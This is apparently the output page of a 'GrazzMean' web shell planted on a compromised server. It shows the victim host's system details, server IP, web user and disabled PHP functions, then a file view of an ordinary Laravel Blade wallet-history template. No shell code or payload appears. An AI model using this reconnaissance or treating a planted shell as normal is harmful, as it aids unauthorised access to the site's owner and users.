shell bypass 403

GrazzMean Shell

Uname: Linux peekpos.com 6.8.0-1060-aws #63~22.04.1-Ubuntu SMP Tue Jun 30 02:32:53 UTC 2026 x86_64
Software: Apache
PHP version: 8.3.25 [ PHP INFO ] PHP os: Linux
Server Ip: 47.130.192.226
Your Ip: 10.1.31.86
User: www (1001) | Group: www (1001)
Safe Mode: OFF
Disable Function:
passthru,putenv,chroot,chgrp,chown,shell_exec,popen,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

name : index.blade.php
@extends('web.layout.default')
@section('page_title')
    | {{ trans('labels.my_wallet') }}
@endsection
@section('content')
    <div class="breadcrumb-sec">
        <div class="container">
            <div class="breadcrumb-sec-content">
                <nav class="text-dark d-flex breadcrumb-divider" aria-label="breadcrumb">
                    <ol class="breadcrumb">
                        <li
                            class="breadcrumb-item {{ session()->get('direction') == '2' ? 'breadcrumb-item-rtl ps-0' : '' }}">
                            <a class="text-dark" href="{{ route('home') }}">{{ trans('labels.home') }}</a>
                        </li>
                        <li class="breadcrumb-item {{ session()->get('direction') == '2' ? 'breadcrumb-item-rtl ps-0' : '' }} text-primary fw-bold active"
                            aria-current="page">{{ trans('labels.my_wallet') }}</li>
                    </ol>
                </nav>
            </div>
        </div>
    </div>
    <section>
        <div class="container my-5">
            <div class="row">
                <div class="col-lg-3">
                    @include('web.layout.usersidebar')
                </div>
                <div class="col-lg-9 d-flex">
                    <div class="user-content-wrapper card">
                        <div class="row justify-content-between mb-3 pb-3 border-bottom g-3">
                            <div class="col-auto">
                                <p class="title color-changer mb-0">{{ trans('labels.my_wallet') }} :- <small
                                        class="green_color">{{ Helper::currency_format(Auth::user()->wallet) }}</small></p>
                            </div>
                            <div class="col-auto"><a href="{{ route('add-money') }}"
                                    class="btn text-white bg-primary px-4 py-2"><i
                                        class="fa-solid fa-plus px-1"></i>{{ trans('labels.add_money') }}</a></div>
                        </div>
                        <div class="row">
                            <ul class="mb-3">
                                <li class="color-changer"><i
                                        class="fa-regular fa-circle-check mx-2 text-success"></i>{{ trans('labels.fast_payment') }}
                                </li>
                                <li class="color-changer"><i
                                        class="fa-regular fa-circle-check mx-2 text-success"></i>{{ trans('labels.secure_payment') }}
                                </li>
                                <li class="color-changer"><i
                                        class="fa-regular fa-circle-check mx-2 text-success"></i>{{ trans('labels.no_document_required') }}
                                </li>
                                <li class="color-changer"><i
                                        class="fa-regular fa-circle-check mx-2 text-success"></i>{{ trans('labels.wallet_note') }}
                                </li>
                            </ul>
                        </div>
                        @if (count($gettransactions) > 0)
                            <div class="row mb-3">
                                <div class="table-responsive">
                                    <table class="table border-top">
                                        <thead class="rounded-top">
                                            <tr class="text-center align-middle">
                                                <th class="fs-7 fw-600 color-changer">{{ trans('labels.date') }}</th>
                                                <th class="fs-7 fw-600 color-changer">{{ trans('labels.description') }}</th>
                                                <th class="fs-7 fw-600 color-changer">{{ trans('labels.amount') }}</th>
                                            </tr>
                                        </thead>
                                        <tbody class="rounded-bottom">
                                            @foreach ($gettransactions as $tdata)
                                                <tr class="text-center align-middle">
                                                    <td class="fs-7 color-changer">{{ Helper::date_format($tdata->created_at) }}</td>
                                                    <td class="fs-7 color-changer w-410">

                                                        @if (in_array($tdata->transaction_type, [101, 102, 103]))
                                                            @if ($tdata->transaction_type == 101)
                                                                {{ trans('labels.referral_earning') }}
                                                                {{ $tdata->username }}
                                                            @elseif ($tdata->transaction_type == 102)
                                                                {{ trans('labels.wallet_recharge') }}
                                                                {{ trans('labels.added_by_admin') }}
                                                            @elseif ($tdata->transaction_type == 103)
                                                                {{ trans('labels.deducted_by_admin') }}
                                                            @endif
                                                        @elseif(in_array($tdata->transaction_type, [3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]))
                                                            {{ trans('labels.wallet_recharge') }}
                                                            {{ Helper::getpayment($tdata->transaction_type) }}
                                                            {{ $tdata->transaction_id }}
                                                        @elseif ($tdata->transaction_type == 2)
                                                            {{ trans('labels.order_cancelled') }}
                                                        @elseif ($tdata->transaction_type == 1)
                                                            {{ trans('labels.order_placed') }}
                                                        @elseif ($tdata->transaction_type == 101)
                                                            {{ trans('labels.referral_earning') }}
                                                            [{{ $tdata->username }}]
                                                        @else
                                                            -
                                                        @endif
                                                        @if (in_array($tdata->transaction_type, [1, 2]))
                                                            [{{ $tdata->order_number }}]
                                                        @endif
                                                    </td>
                                                    <td
                                                        class="fs-7 {{ in_array($tdata->transaction_type, [101, 102, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]) == true ? 'text-success' : 'text-danger' }}">
                                                        @if ($tdata->tips > 0)
                                                            ({{ helper::currency_format($tdata->amount) }}
                                                            +
                                                            {{ trans('labels.tips') . ' : ' . helper::currency_format($tdata->tips) }})
                                                        @else
                                                            {{ helper::currency_format($tdata->amount) }}
                                                        @endif
                                                    </td>
                                                </tr>
                                            @endforeach
                                        </tbody>
                                    </table>
                                </div>
                            </div>
                            <div class="d-flex justify-content-center">
                                {{ $gettransactions->links() }}
                            </div>
                        @else
                            @include('web.nodata')
                        @endif
                    </div>
                </div>
            </div>
        </div>
    </section>
@endsection
© 2026 GrazzMean